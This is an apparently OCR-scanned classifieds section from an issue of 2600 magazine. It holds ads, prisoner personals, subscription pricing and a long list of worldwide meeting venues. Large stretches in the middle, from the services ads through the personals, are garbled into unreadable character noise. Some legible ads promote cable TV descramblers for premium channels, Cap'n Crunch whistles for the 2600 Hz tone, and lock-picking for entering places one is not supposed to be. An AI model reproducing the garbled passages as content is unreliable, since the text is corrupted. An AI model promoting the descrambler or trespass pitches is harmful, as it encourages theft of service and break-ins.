FREEDOM DOWNTIME ON DVD! Years in the making but we hope it was worth the wait. A double DVD set that includes the two hour documentary, an in-depth interview with Kevin Mitnick, and nearly three hours of extra scenes, lost footage, and miscellaneous stuff. Plus captioning for 20 (that's right, 20) languages, commentary track, and a lot of things you'll just have to find for yourself! The entire two disc set can be had by sending $30 to Freedom Downtime DVD, PO Box 752, Middle Island, NY 11953 USA or by ordering from our online store at http://store.2600.com. (VHS copies of the film still available for $15.)
CAP'N CRUNCH WHISTLES. Brand new, only a few left. THE ORIGINAL WHISTLE in mint condition, never used. Join the elite few who own this treasure! Once they are gone, that is it - there are no more! Keychain hole for keyring. Identify yourself at meetings, etc. as a 2600 member by dangling your keychain and saying nothing. Cover one hole and get exactly 2600 hz, cover the other hole and get another frequency. Use both holes to call your dog or dolphin. Also, ideal for telephone remote control devices. Price includes mailing. $79.95. Not only a collector's item but a VERY USEFUL device to carry at all times. Cash or money order only. Mail to: WHISTLE, P.O. Box 11562-ST, CR. Missouri 63105.
PHRAINE. The technology without the noise quarterly would like to thank the 2600 readers who have also become new subscribers and encourages those who have not ACK their need for diverse computer information in conjunction with that of 2600 to dedicate some packets and become a subscriber today! Visit us at our new domain www.pearlyfrepress.comlphraine.
JINX-HACKER CLOTHING/GEAR. Tired of being naked? JINX.com has 300+ T's, sweatshirts, stickers, and hats for those rare times you need to leave your house. We've got swag for everyone, from the budding n00blet to the vintage geek. So take a five minute break from surfing pr0n and check out http://www.JINX.com. Uber-Secret-5lal Mea Promo: Use '2600v3n02' and get 10% off of your order.
LEARN LOCK PICKING. It's EASY with our book and new video. The 2nd edition book adds lots more interesting material and illustrations while the video is filled with computer graphic cutaway views. Learn what they don't want you to know. Any security system can be beaten, many times right through the front door. Learn the secrets and weaknesses of today's locks. If you want to get where you are not supposed to be, this book could be your answer. Explore the empowering world of lock picking. Send t bucks for the book or video to Standard Publications, PO Box 2226HQ, Champaign, IL 61825 or visit us at www.standardpubllcations.comIdir600.html for your 2600 price discount.
CABLE TV DESCRAMBLERS. New. L $55 + $5.00 shipping, money order/cash only. Works on analog or analog/digital cable systems. Premium channels and possibly PPV depending on system. Complete with 110Vac power supply. Purchaser assumes sole responsibility for notifying cable operator of use of descrambler. Requires a cable cer O.e . Redio S 10 D u_ with the unit. Cable connects to the converter, then the descrambler, then the output goes to S tuned to channel 3. CD 9621 Olive. Box 28992-1, Ollvettet Sur. Missouri 63132. Email: cabledescrambleruy@yahoo.com.
Wanted
HAVE KNOWLEDGE OF SECURITY BREACHES at your bank? Heard rumors of cracked customer databases? Know of unaddressed vulnerabilities in a retailer's credit card network, but its management doesn't know or care? We want your tips. We are a business newsletter focusing on security issues in the financial industry: IT security, privacy, regulatory compliance, identity-theft and fraud, money-laundering. Wherever criminal activity meets banks, we are there. You can remain anonymous. (Note: we will not print rumors circulated by one person or group without obtaining supporting evidence or corroboration from other parties.) Contact banksecuritynews@yahoo.com or call 212-564-8972, ext. 102.
Services
Trouber 2000. Forbidden Subjects 3. Hackers Toolkit 2.0, Steal This CD. Hacks & Cracks. Hackerz Krnlcklez. Elite Hackers Toolkit 1,
HACKER TOOLS TREASURE BOX! You get over 630 links to key resources, plus our proven methods for rooting out the har-
O~|DO OO|S, |DSBD|y| LS DS ||DKS BDO PDOOS O DU||O
yOU| OWD CUSOP|2O DBCK| (PMLN, DWO|K SCU||y] OO| K|.
D.lWB|DUDD|.CUmK
ADVANCED TECHNICAL SOLUTIONS. 84ZZ ~ 1 MODSOD |,
VBDCOUV|, .L. LBDBOB VL . D. (4] Z~bb. L|C|OD|C
COUDlP0BSU|0S |DO OU WDO |S %|y V|OOB|Dg yOU O| DUgg|Dg
yOU|CB|O|OC0. B OD P" OC|OD U|PDU|||ZO.
FREERETIREDSTUFFCOM - LODB O| |US | OUOBO CD
|OOUCS ~ |D 0XCDBDg O| SOP0 gOOO KB|RB ~ Dy K|Dg USBD|
UDWBDO CD |PS OU O yOU| D|gDDO|DOOO |BDO|||. D MLL BDO
BSyXBDODOOC|BSS||OBO W0DS||SOS|gDOO|DO |OCB| 0O|
| DyOU| W||||Dg O |CK U yOU| UDWBDO 0CD lOOUCSO| BDyD|Dg
|SyOU DBVOOODB.DBDKyOUO|D||DgUSS|BODWO|OBDOU
yOU|D0Wg|ODB| |0CyC||DglSOURDyO|S||DU|DgD|SBOORC|BSS||0O
BOV0H|S|Dg S|0S BDO DWSgRUSg|ODB||y. WWW.|00M||0OUH.COP
SUSPECTED OR ACCUSED OF A CYBERCRIME IN ANY
CALIFORNIA OR FEDERAL COURT? LODSU| W|D B SPBD|C WB|||O|
COPP|0O O D ||D0|B|OD O |DO|RB|OD. BP BD Bgg|SS|V0 C||R|DB|
O00DS0 |BWy|SC|B||Z|Dg|DDO||OW|DgySOCBS0S. UDBUDO||ZO
BCCSS,D0OlBOS0CS, |O0D|yDl, BDO|BORB|KBDOCOy||gD
|D||Dg0R0D. LODBC LRB| gUB|OB, LS. B (41b] ~bb1 , B
OPB|GS\BDOGB|UPD|.O|g, O| B |OBOWBy, BD |BDC|SCO, LP
41 ~4b. LlBOUB0 O YB|0 LO||0g BDO BDOG LBW CDOO|.
LOP||R0CBSCODSU|B|ODmZ |BBO0|S. P||CODSU|B|ODSa
S||C|y COD|OD|B| BDOlO0CODyD0BOHy~C||0D ||V||g0.
INTELLIGENT HACKERS UNIX SHELL MV|S0.N |S OWDO BDO
O0|B0O Dy |D0|||g0D DBCK . W0 D0||0V0 0V|y US0| DBS D0 |gD O
OD||D SCU||y BDO ||VBCy. D OOBy`S DOS||0 BD|DBCK| BPOSD0,
|D0|||g0D DBCK0|S |U|l0D D0O kB SCU| |BC O WO|K, COP||0,
BDO 0X|OlW|DOUD|g~D|OD||OOK|Dg OV0|D0|| SDOU|O0|. MOS0OB
LD|CBgO cU|D|XW|D JUD|0|||0|BO LO |O0C|OD. NU|||0 |0L
S|V|S B 4 Z.4 gDZ. POlOBD|0 ||C|Dg H $PODD W|D B RODy
DBCKgUBlBD0B. L0|R0 Z% O|SCOUD mZ00|BO0lS.LOUOD COO0.
BV0Z. D.WWW.V|S0.D0
ANTI-CENSORSHIP LlNUX HOSTING, hB|\OD D |OV|OS
BHOlOBD|0 W0D DOS|Dg, PB|| BCCOUDS, BDO OOPB|D |g|S|B|ODS DBSO
OD OUB| RCSSO| 4 Z.4 LMZ LDUX S8. LU| DOS|Dg |BDS SB|
|OP OD|y $.b 0| PODD. D|S |DC|UO0S SUO|l O| yDOD, 0, M,
NywL, BDO RO. YOU CBD DOW CDOOS0 D D0 LP, |DgBO,
BDO OD0| O 8 |OCB|ODS O BVO|O C0DSOlSD| BDO gUBD0B R
SCD. W S0C yOU| ||VBCy. 8yR0D CBD D0 Dy L~LO|O, ByB|,
C|O| CBG, DBDK 0 O| WS0|D LD|OD. WWW.KB|OD.COP O|
O0\B||S.
ARE YOU TIRED O 0V|Dg ||0S O CO| CBlO O0lS BDO OD0|
OS\B| S8RYOU CBD`]US DlOW D0R | DD0U O||0CyC| D0R BS
SOP0OD0 COU|O g0 B DO|O O D0R 8DO US0 D0R O S0B| yOU| O0D|y.
YOU CBD` ]US |0 D0R ||0 U OD yOU| K|CD0D BD|0. O |DS0BO yOU
DBV0 O D0 DOD0l0 W SDOO|Dg BDO O|SOS|Dg O D0R. W||, DO
BDyRO. L!ODNB||BCK.COR DBS B m SO|U|OD kyOU. P|| COSS
o O|SOS| |DC|UO|Dg O0||V0Q W||| D0 B|O Dy D0 CORBDy SODS|D|0
O| S0DO|Dg D0 S O yOU. O W8S|Dg yOU| VB|UBD|0 |R0 O0B||Dg
W|D m OD0f 0|0 a S|D|0 m ClBB|Dg. LD0CK o OU|
D0W|y gD0O WO|COR|00|DOlRB|OD BDO DBCK yOU|
RB||DX.
BEEN ARRESTED FOR A COMPUTER OR TECHNOLOGY RELATED
CRIME? MBV0 8D K, |DV0D|OD, O| DUS|D0SS yOU WBD O DUy, S0||,
RI0C, O| R8lK0 W|SD yOU| 8 OR0y BCUB||y UDO0OOO yOU WD0D
yOU S08K L8WL o N|CDB0| .lB0D, cS. | SD0SO|U|ODO
yOU| Z1S C0 |0gB RD|0RS. OfR0| ySL BDO R0RD0| O RBDy
||VB!0 `S S|DC0 1 1 DOW BVB||BD|0 O O|l0|y lBSD yOU O|
DfOg0 D0 CORRUDC8|ODS @ 8DO 8SSS yOU| CURD|0gB COUDS0|.
cXR0|y dm KDOW|0Og0 |BlO|Dg C|R|DB| 8DO C|V|| ||BD||\y m
CORUI0f 8 0DDO|Ogy 80O BC|ODS [1 O..L. 1 Z, 1 Z, 1 ,
1 1 , 1 41 , 1 4Z, 1 4, Zb1 1 , Zb1 Z, cLP, LNLP, 1 0|0COR A,
0C.], OOR8|D DBR0 O|SU0S, |DI0|0 R0ly RfS SUCD
CDS, U0, ||C0DS0S, BDO BCU|S||ODS W0|| @|
DUS|D0SS 8 CO0 |BW. L 00V0D y 0X0l|0DC0 DDOUS0
|BgB COUDS0| O B CORUBfCODSU|Dg DUS|D0SS BS W0|| BS BD OV0l Z
y0Bl DBCKgRUDO | D CORU0|, 0|0CORRUDCB|ODS, BDO 0CDDO|Ogy
RB0. UD||SD0O M V|0W BlC0, CODfDU0O O DB|ODB||y
UD|SD0O DOOKS, 8DO SUDR|!0O Dl0S O D0 OD|0O B0S UR0
L OD D0 BDO 0DDO|Ogy l0B0O |SSU0S. POR|0O O D0 O..
UR0LOUD, ZDO LRU0 LOUD o PS, 8DO B|| N0W YOlK B0
COUDS 8 BR||B| W|D OD0| ]U||SO|C|ODS BS W0||. NBDy B0yS W|||
\BK0yOU|OWBDyCODS|O0lB|OD O OU|CU|U| BDO W||| SyOU
R0|y B SK o M O W, W | | | ]UO|C0S. Ny
OC0UDO0OSOU|CU|U, | SSR|COyOU|S|UB|OD, BDO W|||
m yOU W|D D0 BDO UDO|Dg yOU O. NO W m
D0 |D||B| BDO CODHO0D|B| CODSU|B|OD BDO, mBDy BSOD w CBDDO
D0| yOU, W0 W||| 0V0DQO|DO60S0WDOCB DOCDB@0. O
yOU DBV0 DOD|Dg O |OS0 $ 0lD8S 0V0lyD|Dg O gB|D Dy CODBC|Dg
USW. V|S| USB. D.WWW.CORCOP O|CB|| b1 ~Wc~McL
[b1~].
Announcements
OF TE H K | S D0W00K|y OD0 DOU| DBCK0| |BO|O SDOW
WOD D|gDS B . R L OD WP .b N | D N0W YlK L|y.
YU CBD B|SO UD0 | D OV0| D0 m WWW.Z.COROHD0DOOK O| OD
SDO|WBV0 |D NOlDBDOOUDPR0l|CB B 41 bKDZ. PRD|V0S OB|| SDOWS
OB|Dg DBCK O 1 CBD D OUDO B D Z00 S|, DOW |D P O|PB
DOWS |OP 1 ~Zb DOW BVB||BO| | D LVL~M O|PB O| $| L|
SUDSC||D OD0D0W D|gD UB||y BUO|O SP|CO|OD|y $b. LBCD PODD
yOU'|| g0 B D0W|y l0|BSO yB| O J HOOk |D D|OBOCBS UB||y
(B|D| DBD |V|OUSOD||D ||BSS]. DO CDCK O| PODyO|O|O
Z L OX bZ, N|OO|0 S|BDO, NY 1 1 b LP O| O|O| D|OUgD OU|
OD||D SO| B D.SO|.Z.COP. YOU| ODBCK OD D |Og|BP |S
B|WByS W0|COP B ODZ.COP.
PHONE PHUN. D.HDODDUD.US. |OgOVOOO |D|S|Dg |OD
DUPD0|S. DB|yOU||DOS|
DO YOU WANT ANOTHER PRINTED MAGAZINE DB COP|PDS
Z W|D V0D RO DBCK|Dg |DC|PB|OD /O8Q HvOlu0On |S B
PBgBZ|D |OP D L|g|B| LBWg OUDO BDOU DBCK|Dg BDO CDDO|Ogy.
C||CB||y, W |OOK B UDO|g|OUDO O|CS O CDDO|Ogy |DC|UO|Dg.
MBCK|Dg, DlBK|Dg, CU||y, L|DSD LX|O|B|OD, L|g|B| M|gDS, BDO
PO. O|PO|0|DO|PB|OD,O|OO|O|yOU|||DOCOy OD||D, V|S| US
B D.WWW. D|DlV.COP WD| yOU W||| B|SO |DO |DS|UC|ODS OD RB||
OlO|S. W0|COP0OD VO|U|OD
CHRISTIAN HACKERS' ASSOCIATION: LDCK OU D0 WD Bg
D.WWW.CD||S|BDDBCK|.Olg O| O0B||S. W X|S O RPO B
CORPUD|y O| LD||S|BD DBCK0|S O O|SCUSS BDO |PBCD |B|P WD|0
mBDOCDDO|Ogy|D|SCO|DU|OSOS|Dg ||VSC|BDgO Dy
LOO`S g|BCDRUgDB|D |DJSUS.
Personals
SEEKING NON-STAGNANT MINDS O| PUUB| |||UP|DB|ODXCDBDg
O DOUgDS BDO |O0BS. D|00 y0B|S |l OD Py SD0DC0 BDO VD
W|D B|| Py COBCD|Dg D0 WB||S S||| CBD CB||y B OC0D CODV|SB|OD.
D0|SS |DC|UO0 C|yOglBDy, SCU||y, CODS||BCy DO||S, PB||B|
BHS, BDO BDyD|Dg CORU| l0|BO. P|| |0 0 |||O O. NBX M|O|,
81 L.L.L., 1 1 1 BOOOCK MO., Py|DB, LL 1 .
IN SEARCH OF FRIENDS/CONTACTS: MB||RBOO Dy |y|Dg V|ODC-
DUQ|DgBg0DSBDOL.. OSB|DSCO|SO|C||PO|ODCOPP|. D
COUH| DBO BSDOWDB||'SCDBDC| DD||. LD|SSOUSPB|\DgOv|DPD
Dy XDUP|Dg D0 0XCU|BO|y BSU| lOV O Py |DDOCDC, R
DO0|0SS|y OUDg0ODO O|D0 OU|B|OD. D0|SOD|yB |||g|BPO| R0
DD WO 00|D||0S. |BUS0O |0U|D O OlV|W|DOU B gD. W| ||
BDSW0| B||. W. WDWOHD OS| 8Z1 1 1 , OUDBS LO|OD LD0|,
L 0OR |PPODS Ll|V0, LDBSOD, NL4.
PRISONER SEEKS FRIENDS O D0| W|D DOOK |0V|W |OOKUS OD
PRBZOD Dy KyWO|OS. LOP C| PB]O|, D||Sy O CBCD U O D |B|
WO||O Oo Ry 0DQ. DBV Ry OWD UDOS O DUy DOOKS. OD|y D00O
V|BWS. L| . . . ` PNLLNNLMS8Vy | D L++yDODMNywL, BDO
`R S0K|Dg |By0|S BDO |Og|BRR0 O| D| |OB OD WDB`S OU
D0|. |0BS D0|. h0D MOD0|S JZ, LP~PZZ44 L L OX
bZ4, LOlCOlBD,LPZ1 Z.
OFFLINE OUTLAW IN TEXAS | S |OOK|Dg O|BDy DOOKS LD|XLDUX CBD
g0 Ry DBDOS OD. P|SO V0Q |D0S0O |D ||VBCy| D B|| Bl0BS. yOU 0
O|D R0 DD0 ||gD O||OD O|00| ||K0 0BCD|Dg BD O|O OOg SOR0 D0W
lCKS, OR R0 B ||D0. ` | | BDSW0| B|| |00lS. RSO DOS0 WDO B|BOy
DBV0, yOU KDOW WDO yOU a. W||||BR LDO|0y ZZ4, 1 N bb,
OSDBRD,.
IN SEARCH OF NEW CONTACTS 0V0lyO8y. DBV0B|O O|RO BSS
BDO B|WByS U k B gOOO O|SCUSS|OD. JO|D SOU|C BUO| BDyOD0
L COU0 0` D8V0 O D OD B0|. D0S1S DO ||R|0O . |OW~|0V0|
L COO|Dg, 0RD0OO0O SyS0RS, C|yO, |BO|O0|0COR, BDO CODS||BCy
D0Q. W||| |yOB||. l|BDB|C0OOPZ1~,L NCh0BD, L.OX
, ,P1 1 .
STILL IN THE JOINT, LD|y By0B|O|SO |0L hDOWDBSP|D8D|S, DUS0O
mDBCK|Dg DBDKS BDO l o UDBUDOlZBW||0H. `R |OOK|Dg
D0B|HBDyOD0| DD0m W.Q|D0S0O | DBDy|O0BS BlO|Dg
UU 0R|OyR0D. W||| SODO O B||. J0l0Ry LUSD|Dg 8Jb1 1 ,
L0D|D0B |SOD, LOXZ1 , R0||B|, LPZZb1Z1 .
CONVICTED COMPUTER CRIMINAL | D 0O0lB| l|SOD OO|Dg
OD P0| yDORR0 VB|0DC0 | D lSOD. |0BS0 Wf0. BU| LUD|
1 bZ~14, OX1 , 8H, LPZ.
SORMBRINGER'S 41 1 : PR DO g0|Dg B B|| SDBK0 | D COUH W|DOUI
BD 8OH0y, SO |`S 1 b RO y0BlS O U||. NO B COO0|O| B W0D O
O|BSDOlWBV0SCBDD0|CORLM-1 ]DB OODB0O OB SDOlWBV0
SIB|OD BDO SOR0 OD0| |D|Dg S . WOU|O |OV O B|K SDO W|D
0O|0ODl8O|O,OOV0|l8O|O,8DODBPl8O|O.W|||lBSODOOB||| 0
0CDD|CB| O|DO. W.h. R|D, 444-, L LURD0BDO, L OX 1 ,
LURD0l|BDO,NLZ1 b1 ~ 1 . WD. WWW.SO|PD||Dg0|.V. LDKO 0|
ONLY SUBSCRIBERS CAN ADVERTISE IN W LOD` 0V0D D|DK
8ly|Dg OBK0OUBDBOUD|0SSyOUSUDSClD0 P||BOSam BDO
D0 |S DO BROUD o ROD0y W0 W||| 8CC0 m B DOD~SUDSC||D0| BO.
W DO0 DB`S C|0B|. LCOUlS0, W0 mO D0 ||gD O BSS]UOgR0D
OD yOU| BO BDO DO f|D |`S 8RB|Dg|y SU|O O| DBS DOD|Dg B B||
O OO W|D D D8CK0| WO||O. W m DO gU BS O D0 D
fgD0USD0SS, SBD|!y, 0C. OD0 0O|0 8S|Dg D. LODBC D0R
ByOU|0l||.P||SUDR|SS|ODSaO|LNc LcLNLY 0yOUWBDO lUD
yOU| a m DBD ODC0 yOU RUS! l0SUDR| | 0 |R0. LOD 0X0
US R fUD mDBD OD0 BO O| yOU | DB S|Dg|0 |SSU0 0|D0|. DC|UO0yOU|
BOOl0SS|BD0|0DV0|O0O|BDOOCOySO W KDOW yOU`|BBSUDSC||D0|.
BDOyOU|BOOZ NBlK0|BC0,LOX, N|OO|0 S|BDO, NY1 1 b.
D0lneWrSprng M.31/07.
Answer choice for Autumn 2006 puzzle:
"Are Pac-Man, Apple, Microsoft, and Dual-Core grain silos as American as Pi? No!"
-- Mister U I e, 20500
NEW PRICES
So how does all this affect you? Simple. It won't affect you at all if you're a subscriber.
If you buy us at a newsstand in the United States, you'll pay 75 cents more. If you buy
us at a newsstand in Canada, you'll pay a dollar less. And if you're somewhere else,
we honestly don't know.
As this is our first price change on the newsstand in more than three years and only the
second since 1999, it's actually a bargain considering how much the cost of everything
has gone up in that period and the fact that we've added lots of pages over the years.
But if you wish to really cling to the past, consider that our subscription price has not
gone up in over 15 years! How insane is that?
All in all, we believe it's still a pretty good deal, regardless of how you choose to buy
our zine. Remember that we survive solely on subscriber support. If we had advertising
we could probably give the thing away for free. But then we just wouldn't be the same
and would probably be unable to print the kinds of things we enjoy printing.
If you found us in a bookstore or at a newsstand, you're probably aware that most
of the magazines surrounding us are nothing like 2600. By keeping our sales strong,
you're voicing support for something different and hopefully that will enable other
alternatives to be considered by distributors and bookstores as well. And this is how
the general public is reached. Despite all of the TV channels, audio devices, and
Internet blogs we're constantly bombarded with, they are just no substitute for books
and magazines. We hear comments like this more than ever these days.
So here's the deal. If you buy the copy you're holding in your hand at a store, there's
no need to read further (unless you want some back issues). If you want to subscribe,
it's $20 for the U.S. and Canada, $30 elsewhere. Back issues are $5 each ($6.50
overseas) except for the most recent one which is $5.50 ($7.00 overseas). Plus there
are all sorts of bulk discounts available at our online store located at
http://store.2600.com.
The address to send physical subscription and back issue requests is:
2600
PO Box 752
Middle Island, NY 11953 USA
(Don't worry, it comes in an envelope that doesn't have our name on it, just our return
address. We're aware of evil parents, spouses, bosses, and prison guards who are
watching you.)
ARGENTINA
Buenos Aires: In the bar at San Jose 05.
AUSTRALIA
Melbourne: Caffeine at ReVault Bar, 16 Swanston Walk, near Melbourne Central Shopping Centre. 6:30 pm.
Sydney: The Crystal Palace, front bar/bistro, opposite the bus station area on George St. at Central Station. 6 pm.
AUSTRIA
Graz: Cafe Haltestelle on Jakominiplatz.
BRAZIL
Belo Horizonte: Pelago's Bar at Assufeng, near the payphone. 6 pm.
CANADA
Alberta
Calgary: Eau Claire Market food court by the bland yellow wall. 6 pm.
British Columbia
Vancouver: lupe Caffe & Bar, 1014 West Georgia St.
Victoria: QV Bakery and Cafe, 1701 Government St.
Manitoba
Winnipeg: St. Vital Shopping Centre, food court by HMV.
New Brunswick
Moncton: Ground Zero Networks Internet Cafe, 720 Main St. 7 pm.
Ontario
Barrie: William's Coffee Pub, 505 Bryne Drive. 7 pm.
Guelph: William's Coffee Pub, 492 Edinbourgh Road South. 7 pm.
Ottawa: World Exchange Plaza, 111 Albert St., second floor. 6:30 pm.
Toronto: College Park Food Court, across from the Taco Bell.
Waterloo: William's Coffee Pub, 170 University Ave. West. 7 pm.
Windsor: University of Windsor, CAW Student Center commons area by the large window. 7 pm.
Quebec
Montreal: Bell Amphitheatre, 1000, rue de la Gauchetiere.
CHINA
Hong Kong: Pacific Coffee in Festival Walk, Kowloon Tong. 7 pm.
CZECH REPUBLIC
Prague: Legenda pub. 6 pm.
DENMARK
Aalborg: Fast Eddie's pool hall.
Aarhus: In the far corner of the DSB cafe in the railway station.
Copenhagen: Cafe Blasen.
Sonderborg: Cafe Druen. 7:30 pm.
EGYPT
Port Said: At the foot of the Obelisk (El Missallah).
ENGLAND
Brighton: At the phone boxes by the Sealife Centre (across the road from the Palace Pier). 7 pm. Payphone: (01273) 606674.
Exeter: At the payphones, Bedford Square. 7 pm.
London: Trocadero Shopping Center (near Piccadilly Circus), lowest level. 6:30 pm.
Manchester: The Green Room on Whitworth St. 7 pm.
Norwich: Borders entrance to Chapelfield Mall. 6 pm.
Reading: Afro Bar, Merchants Place, off Friar St. 6 pm.
FINLAND
Helsinki: Fenniakortteli food court (Vuorikatu 14).
FRANCE
Grenoble: Eve, campus of St. Martin d'Heres. 6 pm.
Paris: Place de la Republique, near the (empty) fountain. 6:30 pm.
Rennes: In front of the store "Blue Box" close to Place de la Republique. 8 pm.
GREECE
Athens: Outside the bookstore Papaswtiriou on the corner of Patision and Stournari.
IRELAND
Dublin: At the phone booths on Wicklow St. beside Tower Records. 7 pm.
ITALY
Milan: Piazza Loreto in front of McDonalds.
JAPAN
Tokyo: Linux Cafe in Akihabara district. 6 pm.
NEW ZEALAND
Auckland: London Bar, upstairs, Wellesley St., Auckland Central. 5:30 pm.
Christchurch: Java Cafe, corner of High St. and Manchester St. 6 pm.
Wellington: Load Cafe in Cuba Mall. 6 pm.
NORWAY
Oslo: Oslo Sentral Train Station. 7 pm.
Tromsoe: The upper floor at Blaa Rock Cafe, Strandgata 14. 6 pm.
Trondheim: Rick's Cafe in Nordre gate. 6 pm.
PERU
Lima: Barbilonia (ex Apu Bar), en Alcanfores 455, Miraflores, at the end of Tarata St. 8 pm.
SCOTLAND
Glasgow: Central Station, payphones next to Platform 1. 7 pm.
SOUTH AFRICA
Johannesburg (Sandton City): Sandton food court. 6:30 pm.
SWEDEN
Gothenburg: 2nd floor in Burger King at Avenyn. 6 pm.
Stockholm: Outside Lava.
SWITZERLAND
Lausanne: In front of the MacDo beside the train station.
UNITED STATES
Alabama
Auburn: The student lounge upstairs in the Foy Union Building. 7 pm.
Huntsville: Stanlieo's Sub Villa on Jordan Lane.
Tuscaloosa: McFarland Mall food court near the front entrance.
Arizona
Phoenix: Peter Piper Pizza, 3945 E. Thomas Rd.
Tucson: Borders in the Park Mall. 7 pm.
California
Los Angeles: Union Station, corner of Macy & Alameda. Inside main entrance by bank of phones. Payphones: (213) 972-9519, 9520; 625-9923, 9924; 613-9704, 9746.
Monterey: London Bridge Pub, 2 Wharf II.
Orange County (Lake Forest): Diedrich Coffee, 22621 Lake Forest Drive. 8 pm.
Sacramento: Round Table Pizza at 127 K St.
San Diego: Regents Pizza, 4150 Regents Park Row #170.
San Francisco: 4 Embarcadero Plaza (inside). Payphones: (415) 398-9803, 9804, 9805, 9806. 5:30 pm.
San Jose: Outside the cafe at the MLK Library at 4th and E. San Fernando. 6 pm.
Colorado
Boulder: Wing Zone food court, 13th and College. 6 pm.
Denver: Borders Cafe, Parker and Arapahoe.
District of Columbia
Arlington: Pentagon City Mall in the food court (near Au Bon Pain). 6 pm.
Florida
Ft. Lauderdale: Broward Mall in the food court. 6 pm.
Gainesville: In the back of the University of Florida's food court. 6 pm.
Orlando: Fashion Square Mall Food Court between HO Gourmet and Manchu Wok. 6 pm.
Tampa: University Mall in the back of the food court on the 2nd floor. 6 pm.
Georgia
Atlanta: Lenox Mall food court. 7 pm.
Idaho
Boise: BSU Student Union Building, upstairs from the main entrance. Payphones: (208) 342-9700, 9701.
Pocatello: College Market, 604 South 8th St.
Illinois
Chicago: Neighborhood Boys and Girls Club, 2501 W. Irving Park Rd. 7 pm.
Indiana
Evansville: Barnes and Noble cafe at 624 S Green River Rd.
Ft. Wayne: Glenbrook Mall food court in front of Sbarro's. 6 pm.
Indianapolis: Corner Coffee, SW corner of 11th and Alabama.
South Bend (Mishawaka): Barnes and Noble cafe, 4601 Grape Rd.
Iowa
Ames: Memorial Union Building food court at the Iowa State University.
Kansas
Kansas City (Overland Park): Oak Park Mall food court.
Wichita: Riverside Perk, 1144 Bitting Ave.
Louisiana
Baton Rouge: In the LSU Union Building, between the Tiger Pause & McDonald's. 6 pm.
New Orleans: Z'otz Coffee House uptown at 8210 Oak Street. 6 pm.
Maine
Portland: Maine Mall by the bench at the food court door.
Maryland
Baltimore: Barnes & Noble cafe at the Inner Harbor.
Massachusetts
Boston: Prudential Center Plaza, terrace food court at the tables near the windows. 6 pm.
Marlborough: Solomon Park Mall food court.
Michigan
Ann Arbor: The Galleria on South University.
Minnesota
Bloomington: Mall of America, north side food court across from Burger King & the bank of payphones that don't take incoming calls.
Missouri
Kansas City (Independence): Barnes & Noble, 19120 East 39th St.
St. Louis: Galleria Food Court.
Springfield: Borders Books and Music coffeeshop, 3300 South Glenstone Ave., one block south of Battlefield Mall. 5:30 pm.
Nebraska
Omaha: Crossroads Mall Food Court. 7 pm.
Nevada
Las Vegas: Coffee Bean Tea Leaf coffee shop, 4550 S. Maryland Pkwy. 7 pm.
New Mexico
Albuquerque: University of New Mexico Student Union Building (plaza "lower" level lounge), main campus. Payphones: 505-843-9033, 505-843-9034. 5:30 pm.
New York
New York: Citigroup Center, in the lobby, near the payphones, 153 E 53rd St., between Lexington & 3rd.
North Carolina
Charlotte: FNk Mall food court. 7 pm.
Raleigh: Royal Bean coffee shop on Hillsboro Street (next to the Playmakers Sports Bar and across from Meredith College).
North Dakota
Fargo: West Acres Mall food court by the Taco John's.
Ohio
Cincinnati: The Brew House, 1047 East McMillan. 7 pm.
Cleveland: University Circle Arabica, 11300 Juniper Rd. Upstairs, turn right, second room on left.
Columbus: Convention center on street level around the corner from the food court.
Dayton: TGI Friday's off 725 by the Dayton Mall.
Oklahoma
Oklahoma City: Cafe Bella, southeast corner of SW 89th St. and Penn.
Tulsa: Promenade Mall food court.
Oregon
Portland: Backspace Cafe, 115 NW 5th Ave. 6 pm.
Pennsylvania
Allentown: Panera Bread, 3100 West Tilghman St. 6 pm.
Philadelphia: 30th St. Station, southeast food court near mini post office.
South Carolina
Charleston: Northwoods Mall in the hall between Sears and Chik-Fil-A.
South Dakota
Sioux Falls: Empire Mall, by Burger King.
Tennessee
Knoxville: Borders Books Cafe across from Westown Mall.
Memphis: Atlanta Bread Co., 4770 Poplar Ave. 6 pm.
Nashville: J-J's Market, 1912 Broadway. 6 pm.
Texas
Austin: Spider House Cafe, 2908 Fruth St. 7 pm.
Houston: Ninfa's Express in front of Nordstrom's in the Galleria Mall.
San Antonio: North Star Mall food court. 6 pm.
Utah
Salt Lake City: ZCMI Mall in The Park Food Court.
Vermont
Burlington: Borders Books at Church St. and Cherry St. on the second floor of the cafe.
Virginia
Arlington: (see District of Columbia)
Virginia Beach: Lynnhaven Mall on Lynnhaven Parkway. 6 pm.
Washington
Seattle: Washington State Convention Center. 2nd level, south side. 6 pm.
Wisconsin
Madison: Union South (227 N. Randall Ave.) on the lower level in the Martin Luther King Jr. Lounge. Payphone: (608) 251-9909.
Milwaukee: The Node, 1504 E. North Ave.
All meetings take place on the first Friday of the month. Unless otherwise noted, they start at 5 pm local time.
To start a meeting in your city, send email to meetings@2600.com.